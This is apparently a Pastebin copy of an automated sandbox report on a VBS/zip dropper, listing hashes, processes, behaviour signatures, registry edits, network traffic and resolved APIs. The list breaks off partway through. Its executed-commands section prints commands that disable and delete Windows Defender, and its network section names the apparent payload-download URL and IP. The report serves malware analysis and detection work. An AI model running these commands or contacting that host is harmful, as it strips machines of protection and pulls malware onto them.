Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- [*] MalFamily: ""
- [*] MalScore: 10.0
- [*] File Name: "VBS_b5964a141f9dbd403f703fabcb67a35d.php"
- [*] File Size: 78441
- [*] File Type: "Zip archive data, at least v2.0 to extract"
- [*] SHA256: "768c9a779430e24806e214136c54f2846a0165fe999a567dbb9d44181c4d7e81"
- [*] MD5: "b5964a141f9dbd403f703fabcb67a35d"
- [*] SHA1: "69993f8f23add05b683b3f34ee11eb1a973d5055"
- [*] SHA512: "c6f9748e0990d2836332bba09d57e642780ccaec467a46209accd24eb1f58f72287c359fffabaa547391fe2f0cfc426b7ebc2ba5f192d21dbab6cea5d6146852"
- [*] CRC32: "680AAA93"
- [*] SSDEEP: "1536:RL+mf26Li1mrzd/P8Nsh8HBGvdZ6BpJA+NeK8XZqMPUuZh++vuioeOt+BuIAAoCF:Ff26Li1Qmg3dug+oJqMPUuZ/uF5+ZPIw"
- [*] Process Execution: [
- "wscript.exe",
- "rst.exe",
- "cmd.exe",
- "powershell.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "sc.exe",
- "cmd.exe",
- "powershell.exe",
- "svchost.exe",
- "services.exe",
- "lsass.exe",
- "taskhost.exe",
- "sc.exe",
- "svchost.exe",
- "svchost.exe",
- "WerFault.exe",
- "wermgr.exe"
- ]
- [*] Signatures Detected: [
- {
- "Description": "At least one process apparently crashed during execution",
- "Details": []
- },
- {
- "Description": "Attempts to connect to a dead IP:Port (1 unique times)",
- "Details": [
- {
- "IP": "67.23.226.169:80"
- }
- ]
- },
- {
- "Description": "Creates RWX memory",
- "Details": []
- },
- {
- "Description": "Possible date expiration check, exits too soon after checking local time",
- "Details": [
- {
- "process": "cmd.exe, PID 2036"
- }
- ]
- },
- {
- "Description": "A process created a hidden window",
- "Details": [
- {
- "Process": "rst.exe -> cmd"
- },
- {
- "Process": "rst.exe -> cmd"
- },
- {
- "Process": "rst.exe -> cmd"
- }
- ]
- },
- {
- "Description": "Drops a binary and executes it",
- "Details": [
- {
- "binary": "C:\\Users\\user\\AppData\\Local\\Temp\\rst.exe"
- }
- ]
- },
- {
- "Description": "Performs some HTTP requests",
- "Details": [
- {
- "url": "http://pearlprofessionalmassage.co.nz/simpleresuct.gov"
- }
- ]
- },
- {
- "Description": "Attempts to stop active services",
- "Details": [
- {
- "servicename": "WinDefend"
- }
- ]
- },
- {
- "Description": "Attempts to repeatedly call a single API many times in order to delay analysis time",
- "Details": [
- {
- "Spam": "services.exe (500) called API GetSystemTimeAsFileTime 13851600 times"
- }
- ]
- },
- {
- "Description": "Spoofs its process name and/or associated pathname to appear as a legitimate process",
- "Details": [
- {
- "modified_name": "svchost.exe",
- "modified_path": "C:\\Users\\user\\AppData\\Local\\Temp\\rst.exe",
- "original_name": "svchost.exe",
- "original_path": "C:\\Windows\\system32\\svchost.exe"
- }
- ]
- },
- {
- "Description": "Creates a hidden or system file",
- "Details": [
- {
- "file": "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1f174e0.TMP"
- }
- ]
- },
- {
- "Description": "Checks the system manufacturer, likely for anti-virtualization",
- "Details": []
- },
- {
- "Description": "Attempts to disable Windows Defender",
- "Details": []
- }
- ]
- [*] Started Service: [
- "KeyIso",
- "WerSvc",
- "W32Time"
- ]
- [*] Executed Commands: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\rst.exe",
- "\"C:\\Windows\\System32\\cmd.exe\" /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
- "cmd /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
- "\"C:\\Windows\\System32\\cmd.exe\" /c sc stop WinDefend",
- "cmd /c sc stop WinDefend",
- "\"C:\\Windows\\System32\\cmd.exe\" /c sc delete WinDefend",
- "cmd /c sc delete WinDefend",
- "C:\\Windows\\system32\\cmd.exe /c sc stop WinDefend",
- "C:\\Windows\\system32\\cmd.exe /c sc delete WinDefend",
- "C:\\Windows\\system32\\cmd.exe /c powershell Set-MpPreference -DisableRealtimeMonitoring $true",
- "C:\\Windows\\system32\\svchost.exe",
- "powershell Set-MpPreference -DisableRealtimeMonitoring $true",
- "sc stop WinDefend",
- "sc delete WinDefend",
- "C:\\Windows\\system32\\lsass.exe",
- "taskhost.exe $(Arg0)",
- "C:\\Windows\\system32\\sc.exe start w32time task_started",
- "C:\\Windows\\system32\\svchost.exe -k LocalService",
- "C:\\Windows\\System32\\svchost.exe -k WerSvcGroup",
- "C:\\Windows\\system32\\WerFault.exe -u -p 1376 -s 288",
- "\"C:\\Windows\\system32\\wermgr.exe\" \"-queuereporting_svc\" \"C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\""
- ]
- [*] Mutexes: [
- "Local\\ZoneAttributeCacheCounterMutex",
- "Local\\ZonesCacheCounterMutex",
- "Local\\ZonesLockedCacheCounterMutex",
- "Global\\CLR_CASOFF_MUTEX",
- "Global\\838B6C9EB27932960",
- "Local\\WERReportingForProcess1376",
- "Global\\\\xe5\\x88\\x90\\xc2\\xab",
- "Global\\\\xe1\\x9f\\xa0\\xc6\\xbb",
- "WERUI_BEX64-e0bfc78dc22baf57413d9e3a2494cb68424d695b"
- ]
- [*] Modified Files: [
- "C:\\Users\\user\\AppData\\Local\\Temp\\rst.exe",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-0000000000-0000000000-0000000000-1000\\00000000-0000-0000-0000-000000000000b_00000000-0000-0000-0000-000000000000",
- "C:\\Users\\user\\AppData\\Local\\Temp\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
- "\\??\\PIPE\\srvsvc",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\II18I4UZ54PZUJWBX0PM.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1f174e0.TMP",
- "C:\\Windows\\SysWOW64\\%ProgramData%\\Microsoft\\Windows\\Start Menu\\Programs\\Accessories\\Windows PowerShell\\Windows PowerShell.lnk",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\OT7ODX92J91JMMC81NCZ.temp",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\d93f411851d7c929.customDestinations-ms",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\4963ad21-c4a5-42a5-b9bd-e441d57204fe",
- "C:\\Windows\\sysnative\\LogFiles\\Scm\\7bbc503c-5977-4798-a4ae-61483a7e030d",
- "\\??\\PIPE\\lsarpc",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA153.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9EF.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA10.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB396.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\WERA153.tmp.appcompat.txt",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\WERA9EF.tmp.WERInternalMetadata.xml",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\WERAA10.tmp.hdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\WERB396.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\Report.wer",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\Report.wer.tmp"
- ]
- [*] Deleted Files: [
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\590aee7bdd69b59b.customDestinations-ms~RF1f174e0.TMP",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\security.config.cch.3000.32601437",
- "C:\\Windows\\Microsoft.NET\\Framework64\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.3000.32601453",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\64bit\\security.config.cch.3000.32601453",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\Windows\\Recent\\CustomDestinations\\OT7ODX92J91JMMC81NCZ.temp",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\security.config.cch.2220.32602921",
- "C:\\Windows\\Microsoft.NET\\Framework\\v2.0.50727\\CONFIG\\enterprisesec.config.cch.2220.32602921",
- "C:\\Users\\user\\AppData\\Roaming\\Microsoft\\CLR Security Config\\v2.0.50727.312\\security.config.cch.2220.32602921",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA153.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA153.tmp.appcompat.txt",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9EF.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERA9EF.tmp.WERInternalMetadata.xml",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA10.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERAA10.tmp.hdmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB396.tmp",
- "C:\\Windows\\ServiceProfiles\\LocalService\\AppData\\Local\\Temp\\WERB396.tmp.mdmp",
- "C:\\ProgramData\\Microsoft\\Windows\\WER\\ReportQueue\\AppCrash_taskhost.exe_e0bfc78dc22baf57413d9e3a2494cb68424d695b_cab_096c9617\\Report.wer.tmp"
- ]
- [*] Modified Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\UNCAsIntranet",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\AutoDetect",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\DisableAntiSpyware",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableBehaviorMonitoring",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnAccessProtection",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableOnRealtimeEnable",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Policies\\Microsoft\\Windows Defender\\Real-Time Protection\\DisableIOAVProtection",
- "DisableNotifications",
- "HKEY_CURRENT_USER\\Software\\Classes\\Local Settings\\MuiCache\\2F\\52C64B7E\\LanguageList",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\WerSvc\\Type",
- "HKEY_LOCAL_MACHINE\\SYSTEM\\ControlSet001\\services\\W32Time\\TimeProviders\\NtpClient\\SpecialPollTimeRemaining",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\Windows Error Reporting\\Consent\\DefaultConsent"
- ]
- [*] Deleted Registry Keys: [
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\ProxyBypass",
- "HKEY_CURRENT_USER\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName",
- "HKEY_LOCAL_MACHINE\\SOFTWARE\\Wow6432Node\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\ZoneMap\\IntranetName"
- ]
- [*] DNS Communications: [
- {
- "type": "A",
- "request": "pearlprofessionalmassage.co.nz",
- "answers": [
- {
- "data": "67.23.226.169",
- "type": "A"
- }
- ]
- }
- ]
- [*] Domains: [
- {
- "ip": "67.23.226.169",
- "domain": "pearlprofessionalmassage.co.nz"
- }
- ]
- [*] Network Communication - ICMP: []
- [*] Network Communication - HTTP: [
- {
- "count": 1,
- "body": "",
- "uri": "http://pearlprofessionalmassage.co.nz/simpleresuct.gov",
- "user-agent": "Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)",
- "method": "GET",
- "host": "pearlprofessionalmassage.co.nz",
- "version": "1.1",
- "path": "/simpleresuct.gov",
- "data": "GET /simpleresuct.gov HTTP/1.1\r\nConnection: Keep-Alive\r\nAccept: */*\r\nAccept-Language: en-us\r\nUser-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)\r\nHost: pearlprofessionalmassage.co.nz\r\n\r\n",
- "port": 80
- }
- ]
- [*] Network Communication - SMTP: []
- [*] Network Communication - Hosts: []
- [*] Network Communication - IRC: []
- [*] Static Analysis: {
- "office": {
- "Metadata": {
- "HasMacros": "No"
- }
- }
- }
- [*] Resolved APIs: [
- "advapi32.dll.SaferIdentifyLevel",
- "advapi32.dll.SaferComputeTokenFromLevel",
- "advapi32.dll.SaferCloseLevel",
- "ole32.dll.CLSIDFromProgIDEx",
- "ole32.dll.CoGetClassObject",
- "wscript.exe.#1",
- "urlmon.dll.#326",
- "urlmon.dll.#327",
- "shell32.dll.#685",
- "shell32.dll.#688",
- "urlmon.dll.#395",
- "cryptsp.dll.CryptAcquireContextW",
- "cryptsp.dll.CryptGenRandom",
- "rpcrtremote.dll.I_RpcExtInitializeExtensionPoint",
- "winhttp.dll.WinHttpCheckPlatform",
- "winhttp.dll.WinHttpOpen",
- "winhttp.dll.WinHttpConnect",
- "winhttp.dll.WinHttpOpenRequest",
- "winhttp.dll.WinHttpCloseHandle",
- "winhttp.dll.WinHttpSendRequest",
- "winhttp.dll.WinHttpReceiveResponse",
- "winhttp.dll.WinHttpAddRequestHeaders",
- "winhttp.dll.WinHttpQueryHeaders",
- "winhttp.dll.WinHttpReadData",
- "winhttp.dll.WinHttpWriteData",
- "winhttp.dll.WinHttpQueryDataAvailable",
- "winhttp.dll.WinHttpQueryOption",
- "winhttp.dll.WinHttpSetOption",
- "winhttp.dll.WinHttpSetTimeouts",
- "winhttp.dll.WinHttpCrackUrl",
- "winhttp.dll.WinHttpCreateUrl",
- "oleaut32.dll.#8",
- "oleaut32.dll.#12",
- "shlwapi.dll.StrRChrA",
- "shlwapi.dll.StrCmpNW",
- "oleaut32.dll.#4",
- "oleaut32.dll.#6",
- "kernel32.dll.RegQueryValueExW",
- "oleaut32.dll.#2",
- "kernel32.dll.RegCloseKey",
- "oleaut32.dll.#9",
- "ws2_32.dll.GetAddrInfoW",
- "ws2_32.dll.WSASocketW",
- "ws2_32.dll.#2",
- "ws2_32.dll.#21",
- "ws2_32.dll.#9",
- "ws2_32.dll.WSAIoctl",
- "ws2_32.dll.FreeAddrInfoW",
- "ws2_32.dll.#6",
- "ws2_32.dll.#5",
- "ws2_32.dll.WSARecv",
- "ws2_32.dll.WSASend",
- "oleaut32.dll.#202",
- "oleaut32.dll.#201",
- "ole32.dll.CreateStreamOnHGlobal",
- "oleaut32.dll.#411",
- "oleaut32.dll.#23",
- "oleaut32.dll.#24",
- "ole32.dll.GetHGlobalFromStream",
- "rpcrt4.dll.RpcBindingFree",
- "oleaut32.dll.#500",
- "cryptsp.dll.CryptReleaseContext",
- "cryptsp.dll.CryptAcquireContextA",
- "kernel32.dll.VirtualAlloc",
- "ntdll.dll.memcpy",
- "kernel32.dll.GetCurrentProcess",
- "kernel32.dll.CloseHandle",
- "advapi32.dll.OpenProcessToken",
- "advapi32.dll.GetTokenInformation",
- "kernel32.dll.Wow64EnableWow64FsRedirection",
- "advapi32.dll.RegCloseKey",
- "advapi32.dll.RegCreateKeyW",
- "advapi32.dll.RegOpenKeyExW",
- "advapi32.dll.RegSetValueExW",
- "shell32.dll.ShellExecuteA",
- "ole32.dll.OleInitialize",
- "cryptbase.dll.SystemFunction036",
- "ole32.dll.CreateBindCtx",
- "ole32.dll.CoTaskMemAlloc",
- "propsys.dll.PSCreateMemoryPropertyStore",
- "propsys.dll.PSPropertyBag_WriteDWORD",
- "ole32.dll.CoGetApartmentType",
- "ole32.dll.CoRegisterInitializeSpy",
- "ole32.dll.CoTaskMemFree",
- "comctl32.dll.#236",
- "ole32.dll.CoGetMalloc",
- "propsys.dll.PSPropertyBag_ReadDWORD",
- "propsys.dll.PSPropertyBag_ReadGUID",
- "comctl32.dll.#320",
- "comctl32.dll.#324",
- "comctl32.dll.#323",
- "advapi32.dll.RegEnumKeyW",
- "advapi32.dll.OpenThreadToken",
- "ole32.dll.StringFromGUID2",
- "apphelp.dll.ApphelpCheckShellObject",
- "ole32.dll.CoCreateInstance",
- "urlmon.dll.CreateUri",
- "kernel32.dll.InitializeSRWLock",
- "kernel32.dll.AcquireSRWLockExclusive",
- "kernel32.dll.AcquireSRWLockShared",
- "kernel32.dll.ReleaseSRWLockExclusive",
- "kernel32.dll.ReleaseSRWLockShared",
- "comctl32.dll.#328",
- "comctl32.dll.#334",
- "shell32.dll.#102",
- "propsys.dll.PSPropertyBag_ReadStrAlloc",
- "ole32.dll.CoInitializeEx",
- "advapi32.dll.InitializeSecurityDescriptor",
- "advapi32.dll.SetEntriesInAclW",
- "ntmarta.dll.GetMartaExtensionInterface",
- "advapi32.dll.SetSecurityDescriptorDacl",
- "advapi32.dll.IsTextUnicode",
- "comctl32.dll.#332",
- "comctl32.dll.#338",
- "comctl32.dll.#339",
- "ole32.dll.CoUninitialize",
- "sechost.dll.ConvertSidToStringSidW",
- "profapi.dll.#104",
- "propsys.dll.#430",
- "advapi32.dll.RegGetValueW",
- "ole32.dll.CoTaskMemRealloc",
- "propsys.dll.InitPropVariantFromStringAsVector",
- "propsys.dll.PSCoerceToCanonicalValue",
- "propsys.dll.PropVariantToStringAlloc",
- "ole32.dll.PropVariantClear",
- "ole32.dll.CoAllowSetForegroundWindow",
- "setupapi.dll.CM_Get_Device_Interface_List_Size_ExW",
- "setupapi.dll.CM_Get_Device_Interface_List_ExW",
- "shell32.dll.SHGetFolderPathW",
- "advapi32.dll.SaferGetPolicyInformation",
- "comctl32.dll.#386",
- "ntdll.dll.RtlDllShutdownInProgress",
- "comctl32.dll.#329",
- "ole32.dll.OleUninitialize",
- "ole32.dll.CoRevokeInitializeSpy",
- "comctl32.dll.#388",
- "advapi32.dll.CryptAcquireContextA",
- "advapi32.dll.CryptImportKey",
- "advapi32.dll.CryptEncrypt",
- "cryptsp.dll.CryptImportKey",
- "cryptbase.dll.SystemFunction040",
- "cryptbase.dll.SystemFunction041",
- "cryptsp.dll.CryptEncrypt",
- "advapi32.dll.UnregisterTraceGuids",
- "comctl32.dll.#321",
- "kernel32.dll.SetThreadUILanguage",
- "kernel32.dll.CopyFileExW",
- "kernel32.dll.IsDebuggerPresent",
- "kernel32.dll.SetConsoleInputExeNameW",
- "kernel32.dll.SortGetHandle",
- "kernel32.dll.SortCloseHandle",
- "uxtheme.dll.ThemeInitApiHook",
- "user32.dll.IsProcessDPIAware",
- "shell32.dll.#66",
- "comctl32.dll.#385",
- "comctl32.dll.#336",
- "comctl32.dll.#333",
- "linkinfo.dll.IsValidLinkInfo",
- "propsys.dll.#417",
- "propsys.dll.PSGetNameFromPropertyKey",
- "propsys.dll.PSStringFromPropertyKey",
- "propsys.dll.InitVariantFromBuffer",
- "propsys.dll.PropVariantToGUID",
- "linkinfo.dll.CreateLinkInfoW",
- "user32.dll.IsCharAlphaW",
- "user32.dll.CharPrevW",
- "ntshrui.dll.GetNetResourceFromLocalPathW",
- "srvcli.dll.NetShareEnum",
- "cscapi.dll.CscNetApiGetInterface",
- "slc.dll.SLGetWindowsInformationDWORD",
- "shlwapi.dll.PathRemoveFileSpecW",
- "linkinfo.dll.DestroyLinkInfo",
- "propsys.dll.PropVariantToBoolean",
- "advapi32.dll.GetSecurityInfo",
- "advapi32.dll.SetSecurityInfo",
- "advapi32.dll.GetSecurityDescriptorControl",
- "advapi32.dll.RegQueryInfoKeyW",
- "advapi32.dll.RegEnumKeyExW",
- "advapi32.dll.RegEnumValueW",
- "advapi32.dll.RegQueryValueExW",
- "shlwapi.dll.UrlIsW",
- "kernel32.dll.InitializeCriticalSectionAndSpinCount",
- "msvcrt.dll._set_error_mode",
- "msvcrt.dll.?set_terminate@@YAP6AXXZP6AXXZ@Z",
- "kernel32.dll.FindActCtxSectionStringW",
- "kernel32.dll.GetSystemWindowsDirectoryW",
- "mscoree.dll.GetProcessExecutableHeap",
- "mscorwks.dll.DllGetClassObjectInternal",
- "mscorwks.dll.GetCLRFunction",
- "advapi32.dll.RegisterTraceGuidsW",
- "advapi32.dll.GetTraceLoggerHandle",
- "advapi32.dll.GetTraceEnableLevel",
- "advapi32.dll.GetTraceEnableFlags",
- "advapi32.dll.TraceEvent",
- "mscoree.dll.IEE",
- "mscorwks.dll.IEE",
- "mscoree.dll.GetStartupFlags",
- "mscoree.dll.GetHostConfigurationFile",
- "mscoree.dll.GetCORSystemDirectory",
- "ntdll.dll.RtlVirtualUnwind",
- "kernel32.dll.IsWow64Process",
- "advapi32.dll.AllocateAndInitializeSid",
- "advapi32.dll.InitializeAcl",
- "advapi32.dll.AddAccessAllowedAce",
- "advapi32.dll.FreeSid",
- "kernel32.dll.SetThreadStackGuarantee",
- "kernel32.dll.FlsSetValue",
- "kernel32.dll.FlsGetValue",
- "kernel32.dll.FlsAlloc",
- "kernel32.dll.FlsFree",
- "kernel32.dll.AddVectoredContinueHandler",
- "kernel32.dll.RemoveVectoredContinueHandler",
- "advapi32.dll.ConvertSidToStringSidW",
- "kernel32.dll.FlushProcessWriteBuffers",
- "kernel32.dll.GetWriteWatch",
- "kernel32.dll.ResetWriteWatch",
- "kernel32.dll.CreateMemoryResourceNotification",
- "kernel32.dll.QueryMemoryResourceNotification",
- "kernel32.dll.GlobalMemoryStatusEx",
- "ole32.dll.CoGetContextToken",
- "oleaut32.dll.#149",
- "kernel32.dll.GetUserDefaultUILanguage",
- "kernel32.dll.GetVersionExW",
- "kernel32.dll.GetFullPathNameW",
- "kernel32.dll.SetErrorMode",
- "kernel32.dll.GetFileAttributesExW",
- "version.dll.GetFileVersionInfoSizeW",
- "version.dll.GetFileVersionInfoW",
- "version.dll.VerQueryValueW",
- "kernel32.dll.lstrlen",
- "kernel32.dll.lstrlenW",
- "mscoree.dll.ND_RI2",
- "kernel32.dll.lstrcpy",
- "kernel32.dll.lstrcpyW",
- "version.dll.VerLanguageNameW",
- "kernel32.dll.GetCurrentProcessId",
- "advapi32.dll.LookupPrivilegeValueW",
- "advapi32.dll.AdjustTokenPrivileges",
- "kernel32.dll.OpenProcess",
- "psapi.dll.EnumProcessModules",
- "psapi.dll.GetModuleInformation",
- "psapi.dll.GetModuleBaseNameW",
- "psapi.dll.GetModuleFileNameExW",
- "kernel32.dll.GetExitCodeProcess",
- "ntdll.dll.NtQuerySystemInformation",
- "user32.dll.EnumWindows",
- "user32.dll.GetWindowThreadProcessId",
- "kernel32.dll.WerSetFlags",
- "kernel32.dll.SetThreadPreferredUILanguages",
- "kernel32.dll.GetThreadPreferredUILanguages",
- "kernel32.dll.GetUserDefaultLocaleName",
- "kernel32.dll.GetEnvironmentVariableW",
- "advapi32.dll.CryptReleaseContext",
- "advapi32.dll.CryptCreateHash",
- "advapi32.dll.CryptDestroyHash",
- "advapi32.dll.CryptHashData",
- "advapi32.dll.CryptGetHashParam",
- "advapi32.dll.CryptExportKey",
- "advapi32.dll.CryptGenKey",
- "advapi32.dll.CryptGetKeyParam",
- "advapi32.dll.CryptDestroyKey",
- "advapi32.dll.CryptVerifySignatureA",
- "advapi32.dll.CryptSignHashA",
- "advapi32.dll.CryptGetProvParam",
- "advapi32.dll.CryptGetUserKey",
- "advapi32.dll.CryptEnumProvidersA",
- "cryptsp.dll.CryptHashData",
- "cryptsp.dll.CryptGetHashParam",
- "cryptsp.dll.CryptDestroyHash",
- "cryptsp.dll.CryptDestroyKey",
- "mscoree.dll.GetTokenForVTableEntry",
- "mscoree.dll.SetTargetForVTableEntry",
- "mscoree.dll.GetTargetForVTableEntry",
- "culture.dll.ConvertLangIdToCultureName",
- "ole32.dll.CoCreateGuid",
- "kernel32.dll.CreateFileW",
- "kernel32.dll.GetConsoleScreenBufferInfo",
- "kernel32.dll.LocalFree",
- "kernel32.dll.LocalAlloc",
- "mscoree.dll.ND_RI4",
- "advapi32.dll.DuplicateTokenEx",
- "advapi32.dll.CheckTokenMembership",
- "kernel32.dll.GetConsoleTitleW",
- "mscorjit.dll.getJit",
- "kernel32.dll.SetConsoleTitleW",
- "kernel32.dll.SetConsoleCtrlHandler",
- "kernel32.dll.CreateEventW",
- "ntdll.dll.WinSqmIsOptedIn",
- "kernel32.dll.ExpandEnvironmentStringsW",
- "shfolder.dll.SHGetFolderPathW",
- "kernel32.dll.SetEnvironmentVariableW",
- "kernel32.dll.GetACP",
- "kernel32.dll.UnmapViewOfFile",
- "kernel32.dll.GetFileType",
- "kernel32.dll.ReadFile",
- "kernel32.dll.GetSystemInfo",
- "kernel32.dll.VirtualQuery",
- "secur32.dll.GetUserNameExW",
- "advapi32.dll.GetUserNameW",
- "kernel32.dll.ReleaseMutex",
- "advapi32.dll.RegisterEventSourceW",
- "advapi32.dll.DeregisterEventSource",
- "advapi32.dll.ReportEventW",
- "kernel32.dll.GetLogicalDrives",
- "kernel32.dll.GetDriveTypeW",
- "kernel32.dll.GetVolumeInformationW",
- "kernel32.dll.GetCurrentDirectoryW",
- "kernel32.dll.GetLastError",
- "kernel32.dll.GetStdHandle",
- "kernel32.dll.GetConsoleMode",
- "kernel32.dll.SetEvent",
- "kernel32.dll.FindFirstFileW",
- "kernel32.dll.FindClose",
- "mscoree.dll.DllGetClassObject",
- "diasymreader.dll.DllGetClassObjectInternal",
- "kernel32.dll.GetConsoleOutputCP",
- "gdi32.dll.TranslateCharsetInfo",
- "kernel32.dll.SetConsoleTextAttribute",
- "kernel32.dll.WriteConsoleW",
- "mscoree.dll.CorExitProcess",
- "mscorwks.dll.CorExitProcess",
- "mscorwks.dll._CorDllMain",
- "kernel32.dll.CreateActCtxW",
- "kernel32.dll.AddRefActCtx",
- "kernel32.dll.ReleaseActCtx",
- "kernel32.dll.ActivateActCtx",
- "kernel32.dll.DeactivateActCtx",
- "kernel32.dll.GetCurrentActCtx",
- "kernel32.dll.QueryActCtxW",
- "netutils.dll.NetApiBufferFree",
- "kernel32.dll.IsProcessorFeaturePresent",
- "ntdll.dll.RtlUnwind",
- "mscoree.dll._CorExeMain",
- "mscoree.dll._CorImageUnloading",
- "mscoree.dll._CorValidateImage",
- "cryptsp.dll.CryptExportKey",
- "cryptsp.dll.CryptCreateHash",
- "kernel32.dll.SwitchToThread",
- "rpcrt4.dll.UuidFromStringW",
- "rpcrt4.dll.RpcBindingCreateW",
- "rpcrt4.dll.RpcBindingBind",
- "sechost.dll.OpenSCManagerW",
- "sechost.dll.OpenServiceW",
- "sechost.dll.StartServiceW",
- "sechost.dll.CloseServiceHandle",
- "sechost.dll.LookupAccountNameLocalW",
- "advapi32.dll.LookupAccountSidW",
- "sechost.dll.LookupAccountSidLocalW",
- "ole32.dll.CoInitializeSecurity",
- "w32time.dll.SvchostEntry_W32Time",
- "w32time.dll.SvchostPushServiceGlobals",
- "sechost.dll.ConvertStringSecurityDescriptorToSecurityDescriptorW",
- "ws2_32.dll.#115",
- "ws2_32.dll.#111",
- "userenv.dll.RegisterGPNotification",
- "gpapi.dll.RegisterGPNotificationInternal",
- "sechost.dll.QueryServiceConfigW",
- "dsrole.dll.DsRoleGetPrimaryDomainInformation",
- "dsrole.dll.DsRoleFreeMemory",
- "sspicli.dll.LsaRegisterPolicyChangeNotification",
- "w32time.dll.TimeProvClose",
- "w32time.dll.TimeProvCommand",
- "w32time.dll.TimeProvOpen",
- "ws2_32.dll.getaddrinfo",
- "ws2_32.dll.freeaddrinfo",
- "ws2_32.dll.#23",
- "ws2_32.dll.WSAEventSelect",
- "vmictimeprovider.dll.TimeProvClose",
